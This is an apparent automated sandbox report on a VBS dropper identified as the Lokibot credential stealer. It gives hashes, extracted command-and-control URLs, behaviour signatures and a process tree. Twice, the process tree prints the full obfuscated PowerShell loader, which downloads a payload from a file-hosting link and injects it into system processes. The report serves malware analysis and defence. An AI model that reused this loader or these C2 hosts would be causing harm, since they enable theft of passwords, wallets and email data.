Overview

overview

10

Static

static

1

2c2a57b3a1...15.vbs

windows7-x64

10

2c2a57b3a1...15.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    145s
  • max time network
    140s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02-10-2024 05:42

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2c2a57b3a137d49c53bf35a36a7136a78d67fcaa16b8f352a6b46a457d691815.vbs

  • Size

    77KB

  • MD5

    34273527e12e172917598d0e29994432

  • SHA1

    d390fd4b4ffc45be0a7cf05765af19e402377640

  • SHA256

    2c2a57b3a137d49c53bf35a36a7136a78d67fcaa16b8f352a6b46a457d691815

  • SHA512

    b9693348f7ddc2564c7a1ce748e58b080c73e57a85ae8f3b673d60106be4c967708c035ca2a820b7470a2be7642592c2db6c14ec9cccd0849eb153f8caebb6f9

  • SSDEEP

    1536:sI0FsAXA4vqGxAx9bBuQPOyk+4OU8vL0yUbVBwXYf:sIcpPAPbB4OFQyIf

Score
10/10
lokibotcollectiondiscoveryspywarestealertrojan

Malware Config

Extracted

Family

lokibot

C2

http://137.184.191.215/index.php/10899

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Signatures

  • Lokibot

    Lokibot is a Password and CryptoCoin Wallet Stealer.

    trojanspywarestealerlokibot
  • Blocklisted process makes network request 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
    collection
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 13 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 43 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2c2a57b3a137d49c53bf35a36a7136a78d67fcaa16b8f352a6b46a457d691815.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4944
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Linnas Kandidtwr overskyet Ecdysial Hjlandene Providentialism Selekteringer #>;$Rystelses='Makeress';<#plungy Firdobling Preferrers Aftvingende Encoders Hardier Forsvarschefernes #>;$Hvsnings=$host.PrivateData;If ($Hvsnings) {$narrishkeit++;}function atomangreb($Antipapistical246){$Bondske=$Fremmeligst+$Antipapistical246.Length-$narrishkeit;for( $Halfheartednesses=5;$Halfheartednesses -lt $Bondske;$Halfheartednesses+=6){$minkfarven+=$Antipapistical246[$Halfheartednesses];}$minkfarven;}function rme($Stillehavsflaadernes){ . ($posthume) ($Stillehavsflaadernes);}$Gulvmaattens=atomangreb 'SpinaMb ugeoSade zSkyldiD.rivlTsarelPartea Hexi/ uror5Angin. Prod0A.tin Manom(skonnWmyoepibarsen MigodUnaudo SulfwSnv.es Lati Kons NBaan.TIniti Kldni1Regis0Bolig.Kirop0Opsam; Civi AntyW Pub iVir,lnWid.w6Rance4 igna;alene A,tabxReemk6Crabb4Speci;Handl IrettrAl,miv Budg:midda1Colpe2N dbr1Bombe. Hosl0Under)Ambit SubelGRenteeU eldcValthkMeethoHyper/In,ho2 Dune0 etnk1 List0 Medb0Nark 1Subef0Alder1 onr WicksFVaginiTwi.trB rguephanefSci,soEnga,xVandl/Gstel1 umsk2 Feri1Skaks.,inkl0 lge ';$librettoens=atomangreb ' alibU Tea,s CirceSui tRBegav- Geopa StorgInhomeIa.hinGarruTDisge ';$Broderierne=atomangreb 'DimplhAntietDistitGastepB,nussKrake:Ungdo/Funkt/Over.d B llr SelviAfd,ivR vieeAfkri.Drogsg RekloBidraoBe,vegIn.mulmarkseR,gnf.FigetcTuberoFamldm tang/.asteuBev.dcP eud?LammieWorkuxUdsk.pDunbaoTilm rRehant P lm=UnuandCaddioMaskiwkinemnVbnenlDelsao SnivaAtolldTegni&AlumriSm gsdBendi= Paal1 UriniIndtjs RecrL A acUDrapezM.dermSilenFdataiJLige 8Su co9 Dobbm knusOTo fl5ContofOrnam9IngenGLingul TomhoSko euZarisount,uL skdyyRefluVCanon7UdtmtqAdmetEMos itUnderw,avsprDividtFattiRTransuPalma ';$Udviskning=atomangreb 'stose>Nedfr ';$posthume=atomangreb 'BargiiMarkoE SkibX oso ';$Cassina='Kendetegner';$Dentine='\Smaalige.Eks';rme (atomangreb 'Rabat$Noncog Tap lNacroo enlsbE segapsychlStagn:AntisO oodvBo ene alkarForbecPsa ooGrundaM rcet Bire= Dy,t$ .ispeMedionvatikv orev:Tr chaPredapBarfop Scled FraiaMatert eskaaVigil+Bes,a$Dem eDB rmae AndrnSeawat oomsiSpi.nnProloeHa de ');rme (atomangreb ' Viva$PedotgDisselT rmkoSairlb PretaFlig.lClogg: KlasURemain Sregs uspet Hoveu agidSpa ei Op,eeReadodPerp.nSaddueAnke s,oextsKommu=Te,te$DriveB urmarT llgoKarnedBioloeVrlesrHeterinons e,athirOleosnInpute Succ.Illu.s Phy p Swi.lFusibiSerpetEkstr(A ous$Anti,UUnderdG udev,ndiui mprosUnshak OpmanOrga iTroopn J.ckgFarth)Staal ');rme (atomangreb ',arak[ KortNPneumeSo attSkovb.SkrmfSOverpeGarnerEnjoyvSlowmiBauxicU.eskeBrndePUndiso.ealiiFladfn Non tS,okiMPrvepaSquifnPortea GonogDemimeAfspnrOtten] Rip :fagbl: MainSF emmeKontrcBud ruLektir Knowi MldttTo nfyShantPver er KammoSymmet Vo doFl.decstratoStranlModpa Heter=Mini Brneb[drot N,erieeRaah t.umle.ForfrSFiloseMyretcStjfruUdlaarGar liBilbotSpilly tartPHock,rEpicloPapert S lioTagkacFrsteo Li,ilCoh,bT Yanoy aurepBeclaeTypec]Prize:Antnd:Re tiTMagnelFordoscadea1 Taoi2Tredi ');$Broderierne=$Unstudiedness[0];$Skomager=(atomangreb ',idde$Ka hagHresvl StamO Kal b S.ocAUnrislTvist:SlagtBRe rojAfhj R S,ilN .uckeProgn=konstn rfrieSphenw cle,- AnemOKartoBHaartJVacuueTrnincDoktoTstige UgunsSDigitYNonexSFlu,stFejlkeSvmmem Trol.DhanuNEfferEProcotUmrke.BugseWBi.leeKalasb.railCRustnlpressILaa.eEtil uNverfeT I dg ');rme ($Skomager);rme (atomangreb 'Prize$ phorBDebaujHuahurOpst nTyfo eFrimr.WaddlHMalkieMis aa nhiddVaasbe,imilr CadisE.for[Forbe$YlettlFaunii Teleb Absur,esideSc.lpt.rbort Debao Ke,beAlh.nnVandlsLogic]Pregg=Reviv$ SociG Mi.tuSclerlNiobivPersomFatteaSk igaGaul tincu t Aa.seSpongnBugvgs P.ra ');$Perdition=atomangreb ' ispl$.rdseBContrjTetrarQuin,n So.keDrage.Trap DHo umoIstn.wR.ingn Panelfragao eiteaSlotedComplFb dehiDrtril G noeKabin(Ma ie$urfunBDisporSpillo Opk dKvruleFdepurPaxili U.gieForgrrSt,drnPuddledipte, Sexi$M nipPforudr.urrao BayepWoulde Mordlruffi) Bypl ';$Propel=$Overcoat;rme (atomangreb 'Ciste$Dra ogEtaetl Ref OTrkg.bPur eaSquabl Scap:KraveCReteaATilbar nfopUnprooAudivGCaseheFago nNur,uOHapchUInappsResid=Nedfa(C.ingtYokele,kulpsForthTlibe -Dyse P HungAFlygtt GiesHOverr baand$ D poPHem tRMilliO raadPAutosEAbstilRefe,) Ass ');while (!$Carpogenous) {rme (atomangreb 'Resum$ ensogKendel Udtao drmmbSgemeaStalkl Br.v: ordiMCha giHem ssKompltTilskiOxy.el Endel LkkeiLgekod pyreeRa.binerotosReall=undia$BilistKostprR allu In teStorf ') ;rme $Perdition;rme (atomangreb 'StreaSSporttsarada Muddr NucutSsyge-revolS irazlLydm eAfseneStachpBa ne olio4 Keou ');rme (atomangreb 'Vir e$Mesteg Co plNordfoNigribBl,ffa Seatl .yrt:fiskeC C,mpa A.terOrthop Eegso oneqgMis ielocomnUlt,aoPrejuu E shs Tppe= Vita(SphalTudrejeDucktsJinritFusti- EnfoPGidseaMed.ctGrupphCirc Navn $,nderPMaarhrV ntroUf rep R maePhosplVener) Gru, ') ;rme (atomangreb 'toywo$ klekgChurllSaboloLs,efbF,actaB jstlPapir: eterODri.kp Fal.tKlammr DazekCh,kenSerioiIndecn arkegLitte= pere$Transg EpislR dakoGr skbSmileaSkriflSyrak:MiswiDIndiai lansSquatp IsoceFo skr Epi,sPr noiO bluo.allon eriseOverer EndonSpej eFlock+S lvr+Gonoz%A omi$UranoUPege,nL llis VaastunaccuEno.mdPantoiLe,icesad ldffebenDispoeAlkohs Tweis .ita. ByrecBoglao MiniuUpswenSt ert heck ') ;$Broderierne=$Unstudiedness[$Optrkning];}$Diktatet=320570;$Syntaksgenkendelserne=31274;rme (atomangreb ' Laan$StartgCoronlMultio OverbUforua .razlAngli:BurnePSuperaBillerBenefaFdresdDischeGall favetguAn dilOutpu Re n=D ama FortjGGravee RundtCargo-mesioC NeuroHerben BandtFosseeKidnanSubcot emia Odor $MissePZenitrFinano Datap s ideVordil Ou s ');rme (atomangreb ' Pra $Gene gskrbelFo gio servbBommeaudma lAnlgg:Sa,elSNaadeyCoequdSavenfAk amoStrtarT rbah AblenY uthgIrvine upernTurcye uzzwsFo nj Udma =Edelh Succe[ GlasSNynazyMikros obbet KeyweParenm Foxd.SpandCRadiaoTransn vetsvTs.tseOlenirB,nkotExcav]Galac:Cani :EstabF ittirCalisoMicromCo toBCorklaDimwisUnp reJurym6Jalou4TsardSnedbrt FzfurPussyiSp ngnGudf.g Ridd(Unjag$ DeodPC lloaMatsar OrdraB,odid Vareep nfefExtrauGlog lZonei) snak ');rme (atomangreb 'Bees,$AgacegR.genlInteroSpaltb landa Vandlfritj: P osRMongreBrancg .omgiTilvioAfs.anSlibrpSphyglMudpuaLv konQuan aThyrorBluenbFir.eeAmetyjLungedByplae,urbarDanse didra=Scrim Ungra[NaboiSTo guyGuya sDramatAskebeTotalmLatin.Unr cT Ve beOverhx OvertBacch. BronE BiolnGoderc moutoFu,igd Missi,iphtn C,tagPreto]Emnea:Nonme:EarthA FlugS atiCPl nuITr,ncIRiefs.JudicGAa dleZygodt illiSEftertjesp,rKeyseiPolonn ispugOutpo(,onoc$ Sk.uSSte tyCheq d CongfLejefoJeme rEndebhF,cadnskewigCho.neTyfusn ameeBro,esVenal) Kyma ');rme (atomangreb 'B,ndo$Ma.neg LupulOvertoLock bFam,laVansilunri :TopfiSDerbunHomoeiSemirgManuav UdkoeAparujAktieeTowie= Bibl$PackeRSanyaeTraadgFeltniintero Led nUnexhpNelielSkykla godvnMeddea mprirPompobRakkeeNostajTheopd Uns eFlankrAfhre.skodds Cinqu etrob Pakhs BagttFremlrBrunliGdni,n OpacgBo se(Tan.k$SuffrD Actiigartnk ap rtMe.tia TambtGimpeeNiftitstavl,Pamfi$DirekS ,artyJ mban Lit tGodstaward k.ntelsHellig RegieBeskynSmedekUnsp,eHeternMen edO ceteK ptalFlgessTakeue RethrT.agin raggeTires) Baad ');rme $Snigveje;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4764
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Linnas Kandidtwr overskyet Ecdysial Hjlandene Providentialism Selekteringer #>;$Rystelses='Makeress';<#plungy Firdobling Preferrers Aftvingende Encoders Hardier Forsvarschefernes #>;$Hvsnings=$host.PrivateData;If ($Hvsnings) {$narrishkeit++;}function atomangreb($Antipapistical246){$Bondske=$Fremmeligst+$Antipapistical246.Length-$narrishkeit;for( $Halfheartednesses=5;$Halfheartednesses -lt $Bondske;$Halfheartednesses+=6){$minkfarven+=$Antipapistical246[$Halfheartednesses];}$minkfarven;}function rme($Stillehavsflaadernes){ . ($posthume) ($Stillehavsflaadernes);}$Gulvmaattens=atomangreb 'SpinaMb ugeoSade zSkyldiD.rivlTsarelPartea Hexi/ uror5Angin. Prod0A.tin Manom(skonnWmyoepibarsen MigodUnaudo SulfwSnv.es Lati Kons NBaan.TIniti Kldni1Regis0Bolig.Kirop0Opsam; Civi AntyW Pub iVir,lnWid.w6Rance4 igna;alene A,tabxReemk6Crabb4Speci;Handl IrettrAl,miv Budg:midda1Colpe2N dbr1Bombe. Hosl0Under)Ambit SubelGRenteeU eldcValthkMeethoHyper/In,ho2 Dune0 etnk1 List0 Medb0Nark 1Subef0Alder1 onr WicksFVaginiTwi.trB rguephanefSci,soEnga,xVandl/Gstel1 umsk2 Feri1Skaks.,inkl0 lge ';$librettoens=atomangreb ' alibU Tea,s CirceSui tRBegav- Geopa StorgInhomeIa.hinGarruTDisge ';$Broderierne=atomangreb 'DimplhAntietDistitGastepB,nussKrake:Ungdo/Funkt/Over.d B llr SelviAfd,ivR vieeAfkri.Drogsg RekloBidraoBe,vegIn.mulmarkseR,gnf.FigetcTuberoFamldm tang/.asteuBev.dcP eud?LammieWorkuxUdsk.pDunbaoTilm rRehant P lm=UnuandCaddioMaskiwkinemnVbnenlDelsao SnivaAtolldTegni&AlumriSm gsdBendi= Paal1 UriniIndtjs RecrL A acUDrapezM.dermSilenFdataiJLige 8Su co9 Dobbm knusOTo fl5ContofOrnam9IngenGLingul TomhoSko euZarisount,uL skdyyRefluVCanon7UdtmtqAdmetEMos itUnderw,avsprDividtFattiRTransuPalma ';$Udviskning=atomangreb 'stose>Nedfr ';$posthume=atomangreb 'BargiiMarkoE SkibX oso ';$Cassina='Kendetegner';$Dentine='\Smaalige.Eks';rme (atomangreb 'Rabat$Noncog Tap lNacroo enlsbE segapsychlStagn:AntisO oodvBo ene alkarForbecPsa ooGrundaM rcet Bire= Dy,t$ .ispeMedionvatikv orev:Tr chaPredapBarfop Scled FraiaMatert eskaaVigil+Bes,a$Dem eDB rmae AndrnSeawat oomsiSpi.nnProloeHa de ');rme (atomangreb ' Viva$PedotgDisselT rmkoSairlb PretaFlig.lClogg: KlasURemain Sregs uspet Hoveu agidSpa ei Op,eeReadodPerp.nSaddueAnke s,oextsKommu=Te,te$DriveB urmarT llgoKarnedBioloeVrlesrHeterinons e,athirOleosnInpute Succ.Illu.s Phy p Swi.lFusibiSerpetEkstr(A ous$Anti,UUnderdG udev,ndiui mprosUnshak OpmanOrga iTroopn J.ckgFarth)Staal ');rme (atomangreb ',arak[ KortNPneumeSo attSkovb.SkrmfSOverpeGarnerEnjoyvSlowmiBauxicU.eskeBrndePUndiso.ealiiFladfn Non tS,okiMPrvepaSquifnPortea GonogDemimeAfspnrOtten] Rip :fagbl: MainSF emmeKontrcBud ruLektir Knowi MldttTo nfyShantPver er KammoSymmet Vo doFl.decstratoStranlModpa Heter=Mini Brneb[drot N,erieeRaah t.umle.ForfrSFiloseMyretcStjfruUdlaarGar liBilbotSpilly tartPHock,rEpicloPapert S lioTagkacFrsteo Li,ilCoh,bT Yanoy aurepBeclaeTypec]Prize:Antnd:Re tiTMagnelFordoscadea1 Taoi2Tredi ');$Broderierne=$Unstudiedness[0];$Skomager=(atomangreb ',idde$Ka hagHresvl StamO Kal b S.ocAUnrislTvist:SlagtBRe rojAfhj R S,ilN .uckeProgn=konstn rfrieSphenw cle,- AnemOKartoBHaartJVacuueTrnincDoktoTstige UgunsSDigitYNonexSFlu,stFejlkeSvmmem Trol.DhanuNEfferEProcotUmrke.BugseWBi.leeKalasb.railCRustnlpressILaa.eEtil uNverfeT I dg ');rme ($Skomager);rme (atomangreb 'Prize$ phorBDebaujHuahurOpst nTyfo eFrimr.WaddlHMalkieMis aa nhiddVaasbe,imilr CadisE.for[Forbe$YlettlFaunii Teleb Absur,esideSc.lpt.rbort Debao Ke,beAlh.nnVandlsLogic]Pregg=Reviv$ SociG Mi.tuSclerlNiobivPersomFatteaSk igaGaul tincu t Aa.seSpongnBugvgs P.ra ');$Perdition=atomangreb ' ispl$.rdseBContrjTetrarQuin,n So.keDrage.Trap DHo umoIstn.wR.ingn Panelfragao eiteaSlotedComplFb dehiDrtril G noeKabin(Ma ie$urfunBDisporSpillo Opk dKvruleFdepurPaxili U.gieForgrrSt,drnPuddledipte, Sexi$M nipPforudr.urrao BayepWoulde Mordlruffi) Bypl ';$Propel=$Overcoat;rme (atomangreb 'Ciste$Dra ogEtaetl Ref OTrkg.bPur eaSquabl Scap:KraveCReteaATilbar nfopUnprooAudivGCaseheFago nNur,uOHapchUInappsResid=Nedfa(C.ingtYokele,kulpsForthTlibe -Dyse P HungAFlygtt GiesHOverr baand$ D poPHem tRMilliO raadPAutosEAbstilRefe,) Ass ');while (!$Carpogenous) {rme (atomangreb 'Resum$ ensogKendel Udtao drmmbSgemeaStalkl Br.v: ordiMCha giHem ssKompltTilskiOxy.el Endel LkkeiLgekod pyreeRa.binerotosReall=undia$BilistKostprR allu In teStorf ') ;rme $Perdition;rme (atomangreb 'StreaSSporttsarada Muddr NucutSsyge-revolS irazlLydm eAfseneStachpBa ne olio4 Keou ');rme (atomangreb 'Vir e$Mesteg Co plNordfoNigribBl,ffa Seatl .yrt:fiskeC C,mpa A.terOrthop Eegso oneqgMis ielocomnUlt,aoPrejuu E shs Tppe= Vita(SphalTudrejeDucktsJinritFusti- EnfoPGidseaMed.ctGrupphCirc Navn $,nderPMaarhrV ntroUf rep R maePhosplVener) Gru, ') ;rme (atomangreb 'toywo$ klekgChurllSaboloLs,efbF,actaB jstlPapir: eterODri.kp Fal.tKlammr DazekCh,kenSerioiIndecn arkegLitte= pere$Transg EpislR dakoGr skbSmileaSkriflSyrak:MiswiDIndiai lansSquatp IsoceFo skr Epi,sPr noiO bluo.allon eriseOverer EndonSpej eFlock+S lvr+Gonoz%A omi$UranoUPege,nL llis VaastunaccuEno.mdPantoiLe,icesad ldffebenDispoeAlkohs Tweis .ita. ByrecBoglao MiniuUpswenSt ert heck ') ;$Broderierne=$Unstudiedness[$Optrkning];}$Diktatet=320570;$Syntaksgenkendelserne=31274;rme (atomangreb ' Laan$StartgCoronlMultio OverbUforua .razlAngli:BurnePSuperaBillerBenefaFdresdDischeGall favetguAn dilOutpu Re n=D ama FortjGGravee RundtCargo-mesioC NeuroHerben BandtFosseeKidnanSubcot emia Odor $MissePZenitrFinano Datap s ideVordil Ou s ');rme (atomangreb ' Pra $Gene gskrbelFo gio servbBommeaudma lAnlgg:Sa,elSNaadeyCoequdSavenfAk amoStrtarT rbah AblenY uthgIrvine upernTurcye uzzwsFo nj Udma =Edelh Succe[ GlasSNynazyMikros obbet KeyweParenm Foxd.SpandCRadiaoTransn vetsvTs.tseOlenirB,nkotExcav]Galac:Cani :EstabF ittirCalisoMicromCo toBCorklaDimwisUnp reJurym6Jalou4TsardSnedbrt FzfurPussyiSp ngnGudf.g Ridd(Unjag$ DeodPC lloaMatsar OrdraB,odid Vareep nfefExtrauGlog lZonei) snak ');rme (atomangreb 'Bees,$AgacegR.genlInteroSpaltb landa Vandlfritj: P osRMongreBrancg .omgiTilvioAfs.anSlibrpSphyglMudpuaLv konQuan aThyrorBluenbFir.eeAmetyjLungedByplae,urbarDanse didra=Scrim Ungra[NaboiSTo guyGuya sDramatAskebeTotalmLatin.Unr cT Ve beOverhx OvertBacch. BronE BiolnGoderc moutoFu,igd Missi,iphtn C,tagPreto]Emnea:Nonme:EarthA FlugS atiCPl nuITr,ncIRiefs.JudicGAa dleZygodt illiSEftertjesp,rKeyseiPolonn ispugOutpo(,onoc$ Sk.uSSte tyCheq d CongfLejefoJeme rEndebhF,cadnskewigCho.neTyfusn ameeBro,esVenal) Kyma ');rme (atomangreb 'B,ndo$Ma.neg LupulOvertoLock bFam,laVansilunri :TopfiSDerbunHomoeiSemirgManuav UdkoeAparujAktieeTowie= Bibl$PackeRSanyaeTraadgFeltniintero Led nUnexhpNelielSkykla godvnMeddea mprirPompobRakkeeNostajTheopd Uns eFlankrAfhre.skodds Cinqu etrob Pakhs BagttFremlrBrunliGdni,n OpacgBo se(Tan.k$SuffrD Actiigartnk ap rtMe.tia TambtGimpeeNiftitstavl,Pamfi$DirekS ,artyJ mban Lit tGodstaward k.ntelsHellig RegieBeskynSmedekUnsp,eHeternMen edO ceteK ptalFlgessTakeue RethrT.agin raggeTires) Baad ');rme $Snigveje;"
    1⤵
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:5032
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\syswow64\msiexec.exe"
      2⤵
        PID:4484
      • C:\Windows\SysWOW64\msiexec.exe
        "C:\Windows\syswow64\msiexec.exe"
        2⤵
          PID:4320
        • C:\Windows\SysWOW64\msiexec.exe
          "C:\Windows\syswow64\msiexec.exe"
          2⤵
            PID:4616
          • C:\Windows\SysWOW64\msiexec.exe
            "C:\Windows\syswow64\msiexec.exe"
            2⤵
              PID:4408
            • C:\Windows\SysWOW64\msiexec.exe
              "C:\Windows\syswow64\msiexec.exe"
              2⤵
                PID:3012
              • C:\Windows\SysWOW64\msiexec.exe
                "C:\Windows\syswow64\msiexec.exe"
                2⤵
                  PID:4128
                • C:\Windows\SysWOW64\msiexec.exe
                  "C:\Windows\syswow64\msiexec.exe"
                  2⤵
                    PID:2244
                  • C:\Windows\SysWOW64\msiexec.exe
                    "C:\Windows\syswow64\msiexec.exe"
                    2⤵
                      PID:4716
                    • C:\Windows\SysWOW64\msiexec.exe
                      "C:\Windows\syswow64\msiexec.exe"
                      2⤵
                        PID:2356
                      • C:\Windows\SysWOW64\msiexec.exe
                        "C:\Windows\syswow64\msiexec.exe"
                        2⤵
                          PID:5080
                        • C:\Windows\SysWOW64\msiexec.exe
                          "C:\Windows\syswow64\msiexec.exe"
                          2⤵
                            PID:3692
                          • C:\Windows\SysWOW64\dxdiag.exe
                            "C:\Windows\syswow64\dxdiag.exe"
                            2⤵
                              PID:1276
                            • C:\Windows\SysWOW64\dxdiag.exe
                              "C:\Windows\syswow64\dxdiag.exe"
                              2⤵
                              • Accesses Microsoft Outlook profiles
                              • Suspicious use of NtCreateThreadExHideFromDebugger
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • System Location Discovery: System Language Discovery
                              • Suspicious use of AdjustPrivilegeToken
                              • outlook_office_path
                              • outlook_win_path
                              PID:2128

                          Network

                          MITRE ATT&CK Enterprise v15

                          Replay Monitor

                          Loading Replay Monitor...

                          Downloads

                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                            Filesize

                            1KB

                            MD5

                            806286a9ea8981d782ba5872780e6a4c

                            SHA1

                            99fe6f0c1098145a7b60fda68af7e10880f145da

                            SHA256

                            cd2c977928e78b2d39bba8a726308f17b2946ea3f1a432de209720f691450713

                            SHA512

                            362df97f9fc9c2f546538814cd0402a364a286326219f03325f8cbd59d33f9d850c26daf42230f0bb4feb7e5134868a51e7a3d2f5bc136fe3de69d5d82c5ae2e

                            Download Submit

                          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_j4kx5uhl.ntc.ps1
                            Filesize

                            60B

                            MD5

                            d17fe0a3f47be24a6453e9ef58c94641

                            SHA1

                            6ab83620379fc69f80c0242105ddffd7d98d5d9d

                            SHA256

                            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                            SHA512

                            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                            Download Submit

                          • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2718105630-359604950-2820636825-1000\0f5007522459c86e95ffcc62f32308f1_32404286-a0b5-4a93-9620-6f13fd83251a
                            Filesize

                            46B

                            MD5

                            c07225d4e7d01d31042965f048728a0a

                            SHA1

                            69d70b340fd9f44c89adb9a2278df84faa9906b7

                            SHA256

                            8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

                            SHA512

                            23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

                            Download Submit

                          • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2718105630-359604950-2820636825-1000\0f5007522459c86e95ffcc62f32308f1_32404286-a0b5-4a93-9620-6f13fd83251a
                            Filesize

                            46B

                            MD5

                            d898504a722bff1524134c6ab6a5eaa5

                            SHA1

                            e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

                            SHA256

                            878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

                            SHA512

                            26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

                            Download Submit

                          • C:\Users\Admin\AppData\Roaming\Smaalige.Eks
                            Filesize

                            458KB

                            MD5

                            743e8aa7e1d11f204b239e36bafc481e

                            SHA1

                            a42afad52fda74decb6deb3a12deacfc6f639873

                            SHA256

                            9ff25a7ebbcf8054d44fd7a23bd936d6a6b7d44e813301872dcb74bbcf918390

                            SHA512

                            66be179d313d849062b7c9c6a5bf20fd8993e34ec2995a4645fb83b3a95ffa676faa066705c48f08a27393117ee4ca0ef46eb4757a363fd5ed500bb24a365580

                            Download Submit

                          • memory/2128-60-0x0000000000400000-0x00000000005E4000-memory.dmp

                            Filesize

                            1.9MB

                            Download

                          • memory/4764-15-0x00007FFAC6860000-0x00007FFAC7321000-memory.dmp

                            Filesize

                            10.8MB

                            Download

                          • memory/4764-17-0x00007FFAC6860000-0x00007FFAC7321000-memory.dmp

                            Filesize

                            10.8MB

                            Download

                          • memory/4764-18-0x00007FFAC6860000-0x00007FFAC7321000-memory.dmp

                            Filesize

                            10.8MB

                            Download

                          • memory/4764-21-0x00007FFAC6860000-0x00007FFAC7321000-memory.dmp

                            Filesize

                            10.8MB

                            Download

                          • memory/4764-14-0x00007FFAC6863000-0x00007FFAC6865000-memory.dmp

                            Filesize

                            8KB

                            Download

                          • memory/4764-12-0x00007FFAC6860000-0x00007FFAC7321000-memory.dmp

                            Filesize

                            10.8MB

                            Download

                          • memory/4764-11-0x00007FFAC6860000-0x00007FFAC7321000-memory.dmp

                            Filesize

                            10.8MB

                            Download

                          • memory/4764-9-0x000002F138480000-0x000002F1384A2000-memory.dmp

                            Filesize

                            136KB

                            Download

                          • memory/4764-0-0x00007FFAC6863000-0x00007FFAC6865000-memory.dmp

                            Filesize

                            8KB

                            Download

                          • memory/5032-26-0x00000000053C0000-0x0000000005426000-memory.dmp

                            Filesize

                            408KB

                            Download

                          • memory/5032-36-0x0000000005570000-0x00000000058C4000-memory.dmp

                            Filesize

                            3.3MB

                            Download

                          • memory/5032-38-0x0000000005AF0000-0x0000000005B0E000-memory.dmp

                            Filesize

                            120KB

                            Download

                          • memory/5032-39-0x0000000005B40000-0x0000000005B8C000-memory.dmp

                            Filesize

                            304KB

                            Download

                          • memory/5032-40-0x0000000007350000-0x00000000079CA000-memory.dmp

                            Filesize

                            6.5MB

                            Download

                          • memory/5032-41-0x0000000006090000-0x00000000060AA000-memory.dmp

                            Filesize

                            104KB

                            Download

                          • memory/5032-42-0x0000000006D70000-0x0000000006E06000-memory.dmp

                            Filesize

                            600KB

                            Download

                          • memory/5032-43-0x0000000006D00000-0x0000000006D22000-memory.dmp

                            Filesize

                            136KB

                            Download

                          • memory/5032-44-0x0000000007F80000-0x0000000008524000-memory.dmp

                            Filesize

                            5.6MB

                            Download

                          • memory/5032-25-0x0000000005350000-0x00000000053B6000-memory.dmp

                            Filesize

                            408KB

                            Download

                          • memory/5032-46-0x0000000008530000-0x000000000BA5D000-memory.dmp

                            Filesize

                            53.2MB

                            Download

                          • memory/5032-24-0x0000000004C20000-0x0000000004C42000-memory.dmp

                            Filesize

                            136KB

                            Download

                          • memory/5032-23-0x0000000004D20000-0x0000000005348000-memory.dmp

                            Filesize

                            6.2MB

                            Download

                          • memory/5032-22-0x0000000002200000-0x0000000002236000-memory.dmp

                            Filesize

                            216KB

                            Download